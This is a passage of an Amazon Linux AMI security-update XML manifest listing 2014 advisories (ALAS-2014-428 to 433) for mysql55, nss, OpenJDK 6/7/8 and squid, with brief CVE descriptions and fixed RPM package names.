epoch="1" arch="i686"><filename>Packages/openssl-1.0.1j-1.80.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1j-1.80.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1j-1.80.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1j-1.80.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1j-1.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-428</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-428: important priority package update for mysql55</title><issued date="2014-10-16 22:14:00" /><updated date="2014-10-16 22:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-6559:
Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier, and 5.6.20 and earlier, allows remote attackers to affect confidentiality via vectors related to C API SSL CERTIFICATE HANDLING.
1153496:
CVE-2014-6559 mysql: unspecified vulnerability related to C API SSL CERTIFICATE HANDLING (CPU October 2014)
CVE-2014-6500:
Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier, and 5.6.20 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via vectors related to SERVER:SSL:yaSSL, a different vulnerability than CVE-2014-6491.
1153487:
CVE-2014-6500 mysql: unspecified vulnerability related to SERVER:SSL:yaSSL (CPU October 2014)
CVE-2014-6494:
Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier, and 5.6.20 and earlier, allows remote attackers to affect availability via vectors related to CLIENT:SSL:yaSSL, a different vulnerability than CVE-2014-6496.
1153484:
CVE-2014-6494 mysql: unspecified vulnerability related to CLIENT:SSL:yaSSL (CPU October 2014)
CVE-2014-6491:
Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier and 5.6.20 and earlier allows remote attackers to affect confidentiality, integrity, and availability via vectors related to SERVER:SSL:yaSSL, a different vulnerability than CVE-2014-6500.
1153483:
CVE-2014-6491 mysql: unspecified vulnerability related to SERVER:SSL:yaSSL (CPU October 2014)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6491" title="" id="CVE-2014-6491" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6494" title="" id="CVE-2014-6494" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6500" title="" id="CVE-2014-6500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6559" title="" id="CVE-2014-6559" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-embedded" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-common" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-common-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-common" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-common-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.40-1.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-429</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-429: important priority package update for nss</title><issued date="2014-10-16 22:14:00" /><updated date="2014-10-16 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3566:
1152789:
CVE-2014-3566 openssl: Padding Oracle On Downgraded Legacy Encryption attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566" title="" id="CVE-2014-3566" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss" version="3.16.2" release="7.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.16.2-7.57.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.16.2" release="7.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.16.2-7.57.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.16.2" release="7.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.16.2-7.57.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.16.2" release="7.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.16.2-7.57.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.16.2" release="7.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.16.2-7.57.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.16.2" release="7.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.16.2-7.57.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.16.2" release="7.57.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.16.2-7.57.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.16.2" release="7.57.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.16.2-7.57.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.16.2" release="7.57.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.16.2-7.57.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.16.2" release="7.57.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.16.2-7.57.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.16.2" release="7.57.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.16.2-7.57.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.16.2" release="7.57.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.16.2-7.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-430</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-430: important priority package update for java-1.6.0-openjdk</title><issued date="2014-10-16 22:15:00" /><updated date="2014-10-16 22:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-6558:
It was discovered that the CipherInputStream class implementation in OpenJDK did not properly handle certain exceptions. This could possibly allow an attacker to affect the integrity of an encrypted stream handled by this class.
CVE-2014-6531:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6519:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6517:
It was discovered that the StAX XML parser in the JAXP component in OpenJDK performed expansion of external parameter entities even when external entity substitution was disabled. A remote attacker could use this flaw to perform XML eXternal Entity (XXE) attack against applications using the StAX parser to parse untrusted XML documents.
CVE-2014-6512:
It was discovered that the DatagramSocket implementation in OpenJDK failed to perform source address checks for packets received on a connected socket. A remote attacker could use this flaw to have their packets processed as if they were received from the expected source.
CVE-2014-6511:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6506:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6504:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6502:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6457:
It was discovered that the TLS/SSL implementation in the JSSE component in OpenJDK failed to properly verify the server identity during the renegotiation following session resumption, making it possible for malicious TLS/SSL servers to perform a Triple Handshake attack against clients using JSSE and client certificate authentication.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6457" title="" id="CVE-2014-6457" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6502" title="" id="CVE-2014-6502" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6504" title="" id="CVE-2014-6504" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6506" title="" id="CVE-2014-6506" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6511" title="" id="CVE-2014-6511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6512" title="" id="CVE-2014-6512" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6517" title="" id="CVE-2014-6517" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6519" title="" id="CVE-2014-6519" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6531" title="" id="CVE-2014-6531" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6558" title="" id="CVE-2014-6558" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1634.html" title="" id="RHSA-2014:1634" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-demo" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.33-67.1.13.5.0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.33-67.1.13.5.0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.33-67.1.13.5.0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.33-67.1.13.5.0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.33-67.1.13.5.0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.33-67.1.13.5.0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.33-67.1.13.5.0.67.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.33-67.1.13.5.0.67.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.33-67.1.13.5.0.67.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.33-67.1.13.5.0.67.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.33-67.1.13.5.0.67.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.33-67.1.13.5.0.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-431</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-431: important priority package update for java-1.7.0-openjdk</title><issued date="2014-10-16 22:16:00" /><updated date="2014-10-16 22:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-6558:
It was discovered that the CipherInputStream class implementation in OpenJDK did not properly handle certain exceptions. This could possibly allow an attacker to affect the integrity of an encrypted stream handled by this class.
CVE-2014-6531:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6519:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6517:
It was discovered that the StAX XML parser in the JAXP component in OpenJDK performed expansion of external parameter entities even when external entity substitution was disabled. A remote attacker could use this flaw to perform XML eXternal Entity (XXE) attack against applications using the StAX parser to parse untrusted XML documents.
CVE-2014-6512:
It was discovered that the DatagramSocket implementation in OpenJDK failed to perform source address checks for packets received on a connected socket. A remote attacker could use this flaw to have their packets processed as if they were received from the expected source.
CVE-2014-6511:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6506:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6504:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6502:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6457:
It was discovered that the TLS/SSL implementation in the JSSE component in OpenJDK failed to properly verify the server identity during the renegotiation following session resumption, making it possible for malicious TLS/SSL servers to perform a Triple Handshake attack against clients using JSSE and client certificate authentication.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6457" title="" id="CVE-2014-6457" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6502" title="" id="CVE-2014-6502" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6504" title="" id="CVE-2014-6504" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6506" title="" id="CVE-2014-6506" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6511" title="" id="CVE-2014-6511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6512" title="" id="CVE-2014-6512" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6517" title="" id="CVE-2014-6517" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6519" title="" id="CVE-2014-6519" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6531" title="" id="CVE-2014-6531" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6558" title="" id="CVE-2014-6558" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1620.html" title="" id="RHSA-2014:1620" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.71-2.5.3.1.49.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.71-2.5.3.1.49.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.71-2.5.3.1.49.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.71-2.5.3.1.49.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.71-2.5.3.1.49.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.71-2.5.3.1.49.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.71-2.5.3.1.49.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.71-2.5.3.1.49.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.71-2.5.3.1.49.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.71-2.5.3.1.49.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.71-2.5.3.1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-432</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-432: important priority package update for java-1.8.0-openjdk</title><issued date="2014-10-16 22:16:00" /><updated date="2014-10-16 22:24:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-6562:
It was discovered that the Libraries component in OpenJDK failed to properly handle ZIP archives that contain entries with a NUL byte used in the file names. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.
CVE-2014-6558:
It was discovered that the CipherInputStream class implementation in OpenJDK did not properly handle certain exceptions. This could possibly allow an attacker to affect the integrity of an encrypted stream handled by this class.
CVE-2014-6531:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6519:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6517:
It was discovered that the StAX XML parser in the JAXP component in OpenJDK performed expansion of external parameter entities even when external entity substitution was disabled. A remote attacker could use this flaw to perform XML eXternal Entity (XXE) attack against applications using the StAX parser to parse untrusted XML documents.
CVE-2014-6512:
It was discovered that the DatagramSocket implementation in OpenJDK failed to perform source address checks for packets received on a connected socket. A remote attacker could use this flaw to have their packets processed as if they were received from the expected source.
CVE-2014-6511:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6506:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6504:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6502:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6468:
It was discovered that the Hotspot component in OpenJDK failed to properly handle malformed Shared Archive files. A local attacker able to modify a Shared Archive file used by a virtual machine of a different user could possibly use this flaw to escalate their privileges.
CVE-2014-6457:
It was discovered that the TLS/SSL implementation in the JSSE component in OpenJDK failed to properly verify the server identity during the renegotiation following session resumption, making it possible for malicious TLS/SSL servers to perform a Triple Handshake attack against clients using JSSE and client certificate authentication.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6457" title="" id="CVE-2014-6457" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6468" title="" id="CVE-2014-6468" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6502" title="" id="CVE-2014-6502" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6504" title="" id="CVE-2014-6504" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6506" title="" id="CVE-2014-6506" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6511" title="" id="CVE-2014-6511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6512" title="" id="CVE-2014-6512" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6517" title="" id="CVE-2014-6517" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6519" title="" id="CVE-2014-6519" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6531" title="" id="CVE-2014-6531" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6558" title="" id="CVE-2014-6558" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6562" title="" id="CVE-2014-6562" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1636.html" title="" id="RHSA-2014:1636" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-devel" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.25-0.b18.4.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.25-0.b18.4.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.25-0.b18.4.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.25-0.b18.4.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.25-0.b18.4.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.25-0.b18.4.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.25-0.b18.4.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.25-0.b18.4.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.25-0.b18.4.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.25-0.b18.4.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.25-0.b18.4.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.25-0.b18.4.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.25-0.b18.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-433</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-433: important priority package update for squid</title><issued date="2014-10-22 20:04:00" /><updated date="2014-10-22 13:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3609:
A flaw was found in the way Squid handled malformed HTTP Range headers. A remote attacker able to send HTTP requests to the Squid proxy could use this flaw to crash Squid.
